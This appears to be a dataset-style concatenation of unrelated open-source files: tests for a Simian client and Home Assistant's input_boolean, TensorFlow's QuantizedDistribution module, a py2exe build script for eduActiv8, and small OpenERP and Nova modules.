method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None error_response = client.Response(status=401, body='fooerror') with mock.patch.object( self.client, 'Do', return_value=error_response) as do_mock: self.assertRaises( client.SimianServerError, self.client._SimianRequest, method, url, headers=headers) do_mock.assert_called_once_with( method, url, body=None, headers=headers, 
output_filename=output_filename) def GenericStubTestAndReturn( self, method, method_return, method_args, stub_method_name, stub_method_return, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_return: any, value to expect from method method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_method_return: any, value to return from stubbed method call stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name """ with mock.patch.object( self.client, stub_method_name, return_value=stub_method_return) as m: got_rv = method(*method_args) self.assertEqual(got_rv, method_return) m.assert_called_once_with(*stub_args, **stub_kwargs) def GenericStubTest( self, method, method_args, stub_method_name, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name Returns: string, 'returnval' """ rv = 'returnval' return self.GenericStubTestAndReturn( method, rv, method_args, stub_method_name, rv, *stub_args, **stub_kwargs) def testGetCatalog(self): """Test GetCatalog().""" name = 'name' self.GenericStubTest( self.client.GetCatalog, [name], '_SimianRequest', 'GET', '/catalog/%s' % name) def testGetManifest(self): """Test GetManifest().""" name = 'name' self.GenericStubTest( self.client.GetManifest, [name], '_SimianRequest', 'GET', '/manifest/%s' % name) def testGetPackage(self): """Test GetPackage().""" name = 'name' self.GenericStubTest( self.client.GetPackage, [name], '_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None) def testGetPackageInfo(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'hello' self.GenericStubTestAndReturn( self.client.GetPackageInfo, 'hello', [filename], '_SimianRequest', response, 'GET', '/pkgsinfo/%s' % filename, full_response=True) def testGetPackageInfoWhenHash(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'body' response.headers = {'x-pkgsinfo-hash': 'hash'} self.GenericStubTestAndReturn( self.client.GetPackageInfo, ('hash', 'body'), [filename, True], '_SimianRequest', response, 'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True) def testDownloadPackage(self): """Test DownloadPackage().""" filename = 'foo' self.GenericStubTest( self.client.DownloadPackage, [filename], '_SimianRequest', 'GET', '/pkgs/%s' % filename, output_filename=filename) def testPostReport(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params], '_SimianRequest', 'POST', url, body) def testPostReportWhenFeedback(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s&_feedback=1' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params, True], '_SimianRequest', 'POST', url, body) def testPostReportBody(self): """Test 
PostReportBody().""" url = '/reports' body = 'foo' self.GenericStubTest( self.client.PostReportBody, [body], '_SimianRequest', 'POST', url, body) def testPostReportBodyWhenFeedback(self): """Test PostReportBody().""" url = '/reports' body = 'foo' body_with_feedback = 'foo&_feedback=1' self.GenericStubTest( self.client.PostReportBody, [body, True], '_SimianRequest', 'POST', url, body_with_feedback) @mock.patch.object(client.os.path, 'isfile', return_value=True) def testUploadFile(self, _): """Test UploadFile().""" file_type = 'log' file_name = 'file.log' file_path = 'path/to/' + file_name url = '/uploadfile/%s/%s' % (file_type, file_name) mock_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=mock_file) with mock.patch.object(self.client, 'Do') as mock_do: self.client.UploadFile(file_path, file_type, _open=mock_open) mock_do.assert_called_once_with('PUT', url, mock_file) @mock.patch.object(client.logging, 'error', autospec=True) @mock.patch.object(client.os.path, 'isfile', return_value=False) def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error): """Test UploadFile() when the file is not found.""" file_path = 'path/to/file.log' self.client.UploadFile(file_path, 'foo-file-type') mock_logging_error.assert_called_once_with( 'UploadFile file not found: %s', file_path) mock_isfile.assert_called_once_with(file_path) class SimianAuthClientTest(basetest.TestCase): """Test SimianAuthClient class.""" def setUp(self): super(SimianAuthClientTest, self).setUp() self.pac = client.SimianAuthClient() def testGetAuthToken(self): """Test GetAuthToken().""" with mock.patch.object(self.pac, 'DoSimianAuth'): self.pac._cookie_token = 'token' self.assertEqual(self.pac.GetAuthToken(), 'token') def testLogoutAuthToken(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'): self.assertTrue(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) def testLogoutAuthTokenWhenFail(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object( self.pac, '_SimianRequest', side_effect=client.SimianServerError): self.assertFalse(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) logging.basicConfig(filename='/dev/null') def main(unused_argv): basetest.main() if __name__ == '__main__': app.run()
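
# --- Illustrative sketch (not Simian client code): the linear-backoff retry
# pattern that testDo / testDoWithRetryHttp500 above assert against
# (sleep(attempt * 5) before each try, stop as soon as the status is not 500).
# The function and its defaults here are hypothetical, not client.Do().
import time


def do_with_retries(request_fn, attempts=4, backoff_seconds=5):
  """Call request_fn() up to `attempts` times with a linear backoff."""
  response = None
  for attempt in xrange(attempts):
    time.sleep(attempt * backoff_seconds)  # 0, 5, 10, ... seconds
    response = request_fn()
    if response.status != 500:  # only HTTP 500 triggers another attempt
      break
  return response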
apache-2.0
alsrgv/tensorflow
tensorflow/contrib/distributions/python/ops/quantized_distribution.py
22
20681
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Quantized distribution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops.distributions import distribution as distributions from tensorflow.python.ops.distributions import util as distribution_util from tensorflow.python.util import deprecation __all__ = ["QuantizedDistribution"] @deprecation.deprecated( "2018-10-01", "The TensorFlow Distributions library has moved to " "TensorFlow Probability " "(https://github.com/tensorflow/probability). You " "should update all references to use `tfp.distributions` " "instead of `tf.contrib.distributions`.", warn_once=True) def _logsum_expbig_minus_expsmall(big, small): """Stable evaluation of `Log[exp{big} - exp{small}]`. To work correctly, we should have the pointwise relation: `small <= big`. Args: big: Floating-point `Tensor` small: Floating-point `Tensor` with same `dtype` as `big` and broadcastable shape. Returns: `Tensor` of same `dtype` of `big` and broadcast shape. """ with ops.name_scope("logsum_expbig_minus_expsmall", values=[small, big]): return math_ops.log(1. - math_ops.exp(small - big)) + big _prob_base_note = """ For whole numbers `y`, ``` P[Y = y] := P[X <= low], if y == low, := P[X > high - 1], y == high, := 0, if j < low or y > high, := P[y - 1 < X <= y], all other y. ``` """ _prob_note = _prob_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. If the base distribution has a `survival_function` method, results will be more accurate for large values of `y`, and in this case the `survival_function` must also be defined on `y - 1`. """ _log_prob_note = _prob_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. If the base distribution has a `log_survival_function` method results will be more accurate for large values of `y`, and in this case the `log_survival_function` must also be defined on `y - 1`. """ _cdf_base_note = """ For whole numbers `y`, ``` cdf(y) := P[Y <= y] = 1, if y >= high, = 0, if y < low, = P[X <= y], otherwise. ``` Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`. This dictates that fractional `y` are first floored to a whole number, and then above definition applies. """ _cdf_note = _cdf_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. """ _log_cdf_note = _cdf_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. """ _sf_base_note = """ For whole numbers `y`, ``` survival_function(y) := P[Y > y] = 0, if y >= high, = 1, if y < low, = P[X <= y], otherwise. 
``` Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`. This dictates that fractional `y` are first floored to a whole number, and then above definition applies. """ _sf_note = _sf_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. """ _log_sf_note = _sf_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. """ class QuantizedDistribution(distributions.Distribution): """Distribution representing the quantization `Y = ceiling(X)`. #### Definition in Terms of Sampling ``` 1. Draw X 2. Set Y <-- ceiling(X) 3. If Y < low, reset Y <-- low 4. If Y > high, reset Y <-- high 5. Return Y ``` #### Definition in Terms of the Probability Mass Function Given scalar random variable `X`, we define a discrete random variable `Y` supported on the integers as follows: ``` P[Y = j] := P[X <= low], if j == low, := P[X > high - 1], j == high, := 0, if j < low or j > high, := P[j - 1 < X <= j], all other j. ``` Conceptually, without cutoffs, the quantization process partitions the real line `R` into half open intervals, and identifies an integer `j` with the right endpoints: ``` R = ... (-2, -1](-1, 0](0, 1](1, 2](2, 3](3, 4] ... j = ... -1 0 1 2 3 4 ... ``` `P[Y = j]` is the mass of `X` within the `jth` interval. If `low = 0`, and `high = 2`, then the intervals are redrawn and `j` is re-assigned: ``` R = (-infty, 0](0, 1](1, infty) j = 0 1 2 ``` `P[Y = j]` is still the mass of `X` within the `jth` interval. #### Examples We illustrate a mixture of discretized logistic distributions [(Salimans et al., 2017)][1]. This is used, for example, for capturing 16-bit audio in WaveNet [(van den Oord et al., 2017)][2]. The values range in a 1-D integer domain of `[0, 2**16-1]`, and the discretization captures `P(x - 0.5 < X <= x + 0.5)` for all `x` in the domain excluding the endpoints. The lowest value has probability `P(X <= 0.5)` and the highest value has probability `P(2**16 - 1.5 < X)`. Below we assume a `wavenet` function. It takes as `input` right-shifted audio samples of shape `[..., sequence_length]`. It returns a real-valued tensor of shape `[..., num_mixtures * 3]`, i.e., each mixture component has a `loc` and `scale` parameter belonging to the logistic distribution, and a `logits` parameter determining the unnormalized probability of that component. ```python import tensorflow_probability as tfp tfd = tfp.distributions tfb = tfp.bijectors net = wavenet(inputs) loc, unconstrained_scale, logits = tf.split(net, num_or_size_splits=3, axis=-1) scale = tf.nn.softplus(unconstrained_scale) # Form mixture of discretized logistic distributions. Note we shift the # logistic distribution by -0.5. This lets the quantization capture "rounding" # intervals, `(x-0.5, x+0.5]`, and not "ceiling" intervals, `(x-1, x]`. discretized_logistic_dist = tfd.QuantizedDistribution( distribution=tfd.TransformedDistribution( distribution=tfd.Logistic(loc=loc, scale=scale), bijector=tfb.AffineScalar(shift=-0.5)), low=0., high=2**16 - 1.) mixture_dist = tfd.MixtureSameFamily( mixture_distribution=tfd.Categorical(logits=logits), components_distribution=discretized_logistic_dist) neg_log_likelihood = -tf.reduce_sum(mixture_dist.log_prob(targets)) train_op = tf.train.AdamOptimizer().minimize(neg_log_likelihood) ``` After instantiating `mixture_dist`, we illustrate maximum likelihood by calculating its log-probability of audio samples as `target` and optimizing. #### References [1]: Tim Salimans, Andrej Karpathy, Xi Chen, and Diederik P. Kingma. 
PixelCNN++: Improving the PixelCNN with discretized logistic mixture likelihood and other modifications. _International Conference on Learning Representations_, 2017. https://arxiv.org/abs/1701.05517 [2]: Aaron van den Oord et al. Parallel WaveNet: Fast High-Fidelity Speech Synthesis. _arXiv preprint arXiv:1711.10433_, 2017. https://arxiv.org/abs/1711.10433 """ @deprecation.deprecated( "2018-10-01", "The TensorFlow Distributions library has moved to " "TensorFlow Probability " "(https://github.com/tensorflow/probability). You " "should update all references to use `tfp.distributions` " "instead of `tf.contrib.distributions`.", warn_once=True) def __init__(self, distribution, low=None, high=None, validate_args=False, name="QuantizedDistribution"): """Construct a Quantized Distribution representing `Y = ceiling(X)`. Some properties are inherited from the distribution defining `X`. Example: `allow_nan_stats` is determined for this `QuantizedDistribution` by reading the `distribution`. Args: distribution: The base distribution class to transform. Typically an instance of `Distribution`. low: `Tensor` with same `dtype` as this distribution and shape able to be added to samples. Should be a whole number. Default `None`. If provided, base distribution's `prob` should be defined at `low`. high: `Tensor` with same `dtype` as this distribution and shape able to be added to samples. Should be a whole number. Default `None`. If provided, base distribution's `prob` should be defined at `high - 1`. `high` must be strictly greater than `low`. validate_args: Python `bool`, default `False`. When `True` distribution parameters are checked for validity despite possibly degrading runtime performance. When `False` invalid inputs may silently render incorrect outputs. name: Python `str` name prefixed to Ops created by this class. Raises: TypeError: If `dist_cls` is not a subclass of `Distribution` or continuous. NotImplementedError: If the base distribution does not implement `cdf`. """ parameters = dict(locals()) values = ( list(distribution.parameters.values()) + [low, high]) with ops.name_scope(name, values=values) as name: self._dist = distribution if low is not None: low = ops.convert_to_tensor(low, name="low") if high is not None: high = ops.convert_to_tensor(high, name="high") check_ops.assert_same_float_dtype( tensors=[self.distribution, low, high]) # We let QuantizedDistribution access _graph_parents since this class is # more like a baseclass. graph_parents = self._dist._graph_parents # pylint: disable=protected-access checks = [] if validate_args and low is not None and high is not None: message = "low must be strictly less than high." checks.append( check_ops.assert_less( low, high, message=message)) self._validate_args = validate_args # self._check_integer uses this. 
with ops.control_dependencies(checks if validate_args else []): if low is not None: self._low = self._check_integer(low) graph_parents += [self._low] else: self._low = None if high is not None: self._high = self._check_integer(high) graph_parents += [self._high] else: self._high = None super(QuantizedDistribution, self).__init__( dtype=self._dist.dtype, reparameterization_type=distributions.NOT_REPARAMETERIZED, validate_args=validate_args, allow_nan_stats=self._dist.allow_nan_stats, parameters=parameters, graph_parents=graph_parents, name=name) @property def distribution(self): """Base distribution, p(x).""" return self._dist @property def low(self): """Lowest value that quantization returns.""" return self._low @property def high(self): """Highest value that quantization returns.""" return self._high def _batch_shape_tensor(self): return self.distribution.batch_shape_tensor() def _batch_shape(self): return self.distribution.batch_shape def _event_shape_tensor(self): return self.distribution.event_shape_tensor() def _event_shape(self): return self.distribution.event_shape def _sample_n(self, n, seed=None): low = self._low high = self._high with ops.name_scope("transform"): n = ops.convert_to_tensor(n, name="n") x_samps = self.distribution.sample(n, seed=seed) ones = array_ops.ones_like(x_samps) # Snap values to the intervals (j - 1, j]. result_so_far = math_ops.ceil(x_samps) if low is not None: result_so_far = array_ops.where(result_so_far < low, low * ones, result_so_far) if high is not None: result_so_far = array_ops.where(result_so_far > high, high * ones, result_so_far) return result_so_far @distribution_util.AppendDocstring(_log_prob_note) def _log_prob(self, y): if not hasattr(self.distribution, "_log_cdf"): raise NotImplementedError( "'log_prob' not implemented unless the base distribution implements " "'log_cdf'") y = self._check_integer(y) try: return self._log_prob_with_logsf_and_logcdf(y) except NotImplementedError: return self._log_prob_with_logcdf(y) def _log_prob_with_logcdf(self, y): return _logsum_expbig_minus_expsmall(self.log_cdf(y), self.log_cdf(y - 1)) def _log_prob_with_logsf_and_logcdf(self, y): """Compute log_prob(y) using log survival_function and cdf together.""" # There are two options that would be equal if we had infinite precision: # Log[ sf(y - 1) - sf(y) ] # = Log[ exp{logsf(y - 1)} - exp{logsf(y)} ] # Log[ cdf(y) - cdf(y - 1) ] # = Log[ exp{logcdf(y)} - exp{logcdf(y - 1)} ] logsf_y = self.log_survival_function(y) logsf_y_minus_1 = self.log_survival_function(y - 1) logcdf_y = self.log_cdf(y) logcdf_y_minus_1 = self.log_cdf(y - 1) # Important: Here we use select in a way such that no input is inf, this # prevents the troublesome case where the output of select can be finite, # but the output of grad(select) will be NaN. # In either case, we are doing Log[ exp{big} - exp{small} ] # We want to use the sf items precisely when we are on the right side of the # median, which occurs when logsf_y < logcdf_y. 
big = array_ops.where(logsf_y < logcdf_y, logsf_y_minus_1, logcdf_y) small = array_ops.where(logsf_y < logcdf_y, logsf_y, logcdf_y_minus_1) return _logsum_expbig_minus_expsmall(big, small) @distribution_util.AppendDocstring(_prob_note) def _prob(self, y): if not hasattr(self.distribution, "_cdf"): raise NotImplementedError( "'prob' not implemented unless the base distribution implements " "'cdf'") y = self._check_integer(y) try: return self._prob_with_sf_and_cdf(y) except NotImplementedError: return self._prob_with_cdf(y) def _prob_with_cdf(self, y): return self.cdf(y) - self.cdf(y - 1) def _prob_with_sf_and_cdf(self, y): # There are two options that would be equal if we had infinite precision: # sf(y - 1) - sf(y) # cdf(y) - cdf(y - 1) sf_y = self.survival_function(y) sf_y_minus_1 = self.survival_function(y - 1) cdf_y = self.cdf(y) cdf_y_minus_1 = self.cdf(y - 1) # sf_prob has greater precision iff we're on the right side of the median. return array_ops.where( sf_y < cdf_y, # True iff we're on the right side of the median. sf_y_minus_1 - sf_y, cdf_y - cdf_y_minus_1) @distribution_util.AppendDocstring(_log_cdf_note) def _log_cdf(self, y): low = self._low high = self._high # Recall the promise: # cdf(y) := P[Y <= y] # = 1, if y >= high, # = 0, if y < low, # = P[X <= y], otherwise. # P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in # between. j = math_ops.floor(y) result_so_far = self.distribution.log_cdf(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: neg_inf = -np.inf * array_ops.ones_like(result_so_far) result_so_far = array_ops.where(j < low, neg_inf, result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.zeros_like(result_so_far), result_so_far) return result_so_far @distribution_util.AppendDocstring(_cdf_note) def _cdf(self, y): low = self._low high = self._high # Recall the promise: # cdf(y) := P[Y <= y] # = 1, if y >= high, # = 0, if y < low, # = P[X <= y], otherwise. # P[Y <= j] = P[floor(Y) <= j] since mass is only at integers, not in # between. j = math_ops.floor(y) # P[X <= j], used when low < X < high. result_so_far = self.distribution.cdf(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: result_so_far = array_ops.where(j < low, array_ops.zeros_like(result_so_far), result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.ones_like(result_so_far), result_so_far) return result_so_far @distribution_util.AppendDocstring(_log_sf_note) def _log_survival_function(self, y): low = self._low high = self._high # Recall the promise: # survival_function(y) := P[Y > y] # = 0, if y >= high, # = 1, if y < low, # = P[X > y], otherwise. # P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in # between. j = math_ops.ceil(y) # P[X > j], used when low < X < high. result_so_far = self.distribution.log_survival_function(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. 
if low is not None: result_so_far = array_ops.where(j < low, array_ops.zeros_like(result_so_far), result_so_far) if high is not None: neg_inf = -np.inf * array_ops.ones_like(result_so_far) result_so_far = array_ops.where(j >= high, neg_inf, result_so_far) return result_so_far @distribution_util.AppendDocstring(_sf_note) def _survival_function(self, y): low = self._low high = self._high # Recall the promise: # survival_function(y) := P[Y > y] # = 0, if y >= high, # = 1, if y < low, # = P[X > y], otherwise. # P[Y > j] = P[ceiling(Y) > j] since mass is only at integers, not in # between. j = math_ops.ceil(y) # P[X > j], used when low < X < high. result_so_far = self.distribution.survival_function(j) # Broadcast, because it's possible that this is a single distribution being # evaluated on a number of samples, or something like that. j += array_ops.zeros_like(result_so_far) # Re-define values at the cutoffs. if low is not None: result_so_far = array_ops.where(j < low, array_ops.ones_like(result_so_far), result_so_far) if high is not None: result_so_far = array_ops.where(j >= high, array_ops.zeros_like(result_so_far), result_so_far) return result_so_far def _check_integer(self, value): with ops.name_scope("check_integer", values=[value]): value = ops.convert_to_tensor(value, name="value") if not self.validate_args: return value dependencies = [distribution_util.assert_integer_form( value, message="value has non-integer components.")] return control_flow_ops.with_dependencies(dependencies, value)
apache-2.0
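A minimal usage sketch for the class above (not part of the original file): per the deprecation note, the same class is available as tfp.distributions.QuantizedDistribution in TensorFlow Probability. The loc/scale values and the [0, 255] range are illustrative, mirroring the discretized-logistic setup cited in the docstring.

import tensorflow_probability as tfp
tfd = tfp.distributions

# Y = ceiling(X) with X ~ Logistic, snapped into {0, 1, ..., 255}.
dist = tfd.QuantizedDistribution(
    distribution=tfd.Logistic(loc=100., scale=8.),
    low=0.,
    high=255.)

pmf = dist.prob([0., 100., 255.])   # P[Y = y] at whole-number y
log_pmf = dist.log_prob(100.)       # computed from log_cdf / log_survival_function
samples = dist.sample(4)            # integer-valued samples clipped to [0, 255]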
imiolek-ireneusz/eduActiv8
eduactiv82exe.py
1
6732
# -*- coding: utf8 -*- # This will create a dist directory containing the executable file, all the data # directories. All Libraries will be bundled in executable file. # # Run the build process by entering 'pygame2exe.py' or # 'python pygame2exe.py' in a console prompt. # # To build exe, python, pygame, and py2exe have to be installed. After # building exe none of this libraries are needed. # Please Note have a backup file in a different directory as if it crashes you # will loose it all!(I lost 6 months of work because I did not do this) # http://pygame.org/wiki/Pygame2exe try: from distutils.core import setup import py2exe, pygame from modulefinder import Module import glob, fnmatch import sys, os, shutil import operator import appdirs import packaging except ImportError, message: raise SystemExit, "Unable to load module. %s" % message # hack which fixes the pygame mixer and pygame font origIsSystemDLL = py2exe.build_exe.isSystemDLL # save the orginal before we edit it def isSystemDLL(pathname): # checks if the freetype and ogg dll files are being included if os.path.basename(pathname).lower() in ( "libfreetype-6.dll", "libogg-0.dll", "sdl_ttf.dll"): # "sdl_ttf.dll" added by arit. return 0 return origIsSystemDLL(pathname) # return the orginal function py2exe.build_exe.isSystemDLL = isSystemDLL # override the default function with this one class pygame2exe( py2exe.build_exe.py2exe): # This hack make sure that pygame default font is copied: no need to modify code for specifying default font def copy_extensions(self, extensions): # Get pygame default font pygamedir = os.path.split(pygame.base.__file__)[0] pygame_default_font = os.path.join(pygamedir, pygame.font.get_default_font()) # Add font to list of extension to be copied extensions.append(Module("pygame.font", pygame_default_font)) py2exe.build_exe.py2exe.copy_extensions(self, extensions) class BuildExe: def __init__(self): # Name of starting .py self.script = "eduactiv8.py" # Name of program self.project_name = "eduActiv8" # Project url self.project_url = "https://www.eduactiv8.org" # Version of program self.project_version = "1.0" # License of the program self.license = "GPL3" # Auhor of program self.author_name = "Ireneusz Imiolek" self.author_email = "[email protected]" self.copyright = "Copyright (c) 2012-2019 Ireneusz Imiolek" # Description self.project_description = "eduActiv8 - Educational Activities for Kids" # Icon file (None will use pygame default icon) self.icon_file = os.path.join("res", "icon", "eduactiv8.ico") # Extra files/dirs copied to game self.extra_datas = ["classes", "game_boards", "i18n", "locale", "res", "xml"] # Extra/excludes python modules self.extra_modules = ['appdirs', 'packaging'] # showed missing in result compilation self.exclude_modules = [] # DLL Excludes self.exclude_dll = [''] # python scripts (strings) to be included, seperated by a comma self.extra_scripts = [] # Zip file name (None will bundle files in exe instead of zip file) self.zipfile_name = None # Dist directory self.dist_dir = 'dist' # Code from DistUtils tutorial at http://wiki.python.org/moin/Distutils/Tutorial # Originally borrowed from wxPython's setup and config files def opj(self, *args): path = os.path.join(*args) return os.path.normpath(path) def find_data_files(self, srcdir, *wildcards, **kw): # get a list of all files under the srcdir matching wildcards, # returned in a format to be used for install_data def walk_helper(arg, dirname, files): if '.svn' in dirname: return names = [] lst, wildcards = arg for wc in wildcards: 
wc_name = self.opj(dirname, wc) for f in files: filename = self.opj(dirname, f) if fnmatch.fnmatch(filename, wc_name) and not os.path.isdir(filename): names.append(filename) if names: lst.append((dirname, names)) file_list = [] recursive = kw.get('recursive', True) if recursive: os.path.walk(srcdir, walk_helper, (file_list, wildcards)) else: walk_helper((file_list, wildcards), srcdir, [os.path.basename(f) for f in glob.glob(self.opj(srcdir, '*'))]) return file_list def run(self): if os.path.isdir(self.dist_dir): # Erase previous destination dir shutil.rmtree(self.dist_dir) # Use the default pygame icon, if none given if self.icon_file is None: path = os.path.split(pygame.__file__)[0] self.icon_file = os.path.join(path, 'pygame.ico') # List all data files to add extra_datas = ["__init__.py", "CHANGES.txt", "CREDITS.txt", "eduactiv8.py", "LICENSE", "README.txt"] for data in self.extra_datas: if os.path.isdir(data): extra_datas.extend(self.find_data_files(data, '*')) else: extra_datas.append(('.', [data])) setup( cmdclass={'py2exe': pygame2exe}, version=self.project_version, description=self.project_description, name=self.project_name, url=self.project_url, author=self.author_name, author_email=self.author_email, license=self.license, # targets to build # console = [{ windows=[{ 'script': self.script, 'icon_resources': [(0, self.icon_file)], 'copyright': self.copyright }], options={'py2exe': {'optimize': 2, 'bundle_files': 1, 'compressed': True, 'excludes': self.exclude_modules, 'packages': self.extra_modules, 'dll_excludes': self.exclude_dll, 'includes': self.extra_scripts}}, zipfile=self.zipfile_name, data_files=extra_datas, dist_dir=self.dist_dir ) if os.path.isdir('build'): # Clean up build dir shutil.rmtree('build') if __name__ == '__main__': if operator.lt(len(sys.argv), 2): sys.argv.append('py2exe') BuildExe().run() # Run generation
gpl-3.0
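For clarity, a small hand-written illustration of what the find_data_files() helper above returns; the paths are hypothetical, not generated from the real project tree. The build itself is started with `python eduactiv82exe.py` (the script appends 'py2exe' automatically when no argument is given).

# Hypothetical example of the (dirname, [filenames]) pairs produced by
# find_data_files('res', '*'), which is the format the distutils
# data_files argument expects:
example_datas = [
    ('res', ['res/CREDITS.txt']),
    ('res/icon', ['res/icon/eduactiv8.ico']),
    ('res/images', ['res/images/logo.png', 'res/images/board.png']),
]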
moylop260/odoo-dev
addons/hr_timesheet_invoice/wizard/__init__.py
433
1159
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import hr_timesheet_invoice_create import hr_timesheet_analytic_profit import hr_timesheet_final_invoice_create # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
ChinaMassClouds/copenstack-server
openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/createserverext.py
100
1156
# Copyright 2011 OpenStack Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.api.openstack import extensions class Createserverext(extensions.ExtensionDescriptor): """Extended support to the Create Server v1.1 API.""" name = "Createserverext" alias = "os-create-server-ext" namespace = ("http://docs.openstack.org/compute/ext/" "createserverext/api/v1.1") updated = "2011-07-19T00:00:00Z" def get_resources(self): res = extensions.ResourceExtension('os-create-server-ext', inherits='servers') return [res]
gpl-2.0
srcLurker/home-assistant
tests/components/test_input_boolean.py
15
3095
"""The tests for the input_boolean component.""" # pylint: disable=protected-access import unittest import logging from tests.common import get_test_home_assistant from homeassistant.bootstrap import setup_component from homeassistant.components.input_boolean import ( DOMAIN, is_on, toggle, turn_off, turn_on) from homeassistant.const import ( STATE_ON, STATE_OFF, ATTR_ICON, ATTR_FRIENDLY_NAME) _LOGGER = logging.getLogger(__name__) class TestInputBoolean(unittest.TestCase): """Test the input boolean module.""" # pylint: disable=invalid-name def setUp(self): """Setup things to be run when tests are started.""" self.hass = get_test_home_assistant() # pylint: disable=invalid-name def tearDown(self): """Stop everything that was started.""" self.hass.stop() def test_config(self): """Test config.""" invalid_configs = [ None, 1, {}, {'name with space': None}, ] for cfg in invalid_configs: self.assertFalse( setup_component(self.hass, DOMAIN, {DOMAIN: cfg})) def test_methods(self): """Test is_on, turn_on, turn_off methods.""" self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: { 'test_1': None, }})) entity_id = 'input_boolean.test_1' self.assertFalse( is_on(self.hass, entity_id)) turn_on(self.hass, entity_id) self.hass.block_till_done() self.assertTrue( is_on(self.hass, entity_id)) turn_off(self.hass, entity_id) self.hass.block_till_done() self.assertFalse( is_on(self.hass, entity_id)) toggle(self.hass, entity_id) self.hass.block_till_done() self.assertTrue(is_on(self.hass, entity_id)) def test_config_options(self): """Test configuration options.""" count_start = len(self.hass.states.entity_ids()) _LOGGER.debug('ENTITIES @ start: %s', self.hass.states.entity_ids()) self.assertTrue(setup_component(self.hass, DOMAIN, {DOMAIN: { 'test_1': None, 'test_2': { 'name': 'Hello World', 'icon': 'mdi:work', 'initial': True, }, }})) _LOGGER.debug('ENTITIES: %s', self.hass.states.entity_ids()) self.assertEqual(count_start + 2, len(self.hass.states.entity_ids())) state_1 = self.hass.states.get('input_boolean.test_1') state_2 = self.hass.states.get('input_boolean.test_2') self.assertIsNotNone(state_1) self.assertIsNotNone(state_2) self.assertEqual(STATE_OFF, state_1.state) self.assertNotIn(ATTR_ICON, state_1.attributes) self.assertNotIn(ATTR_FRIENDLY_NAME, state_1.attributes) self.assertEqual(STATE_ON, state_2.state) self.assertEqual('Hello World', 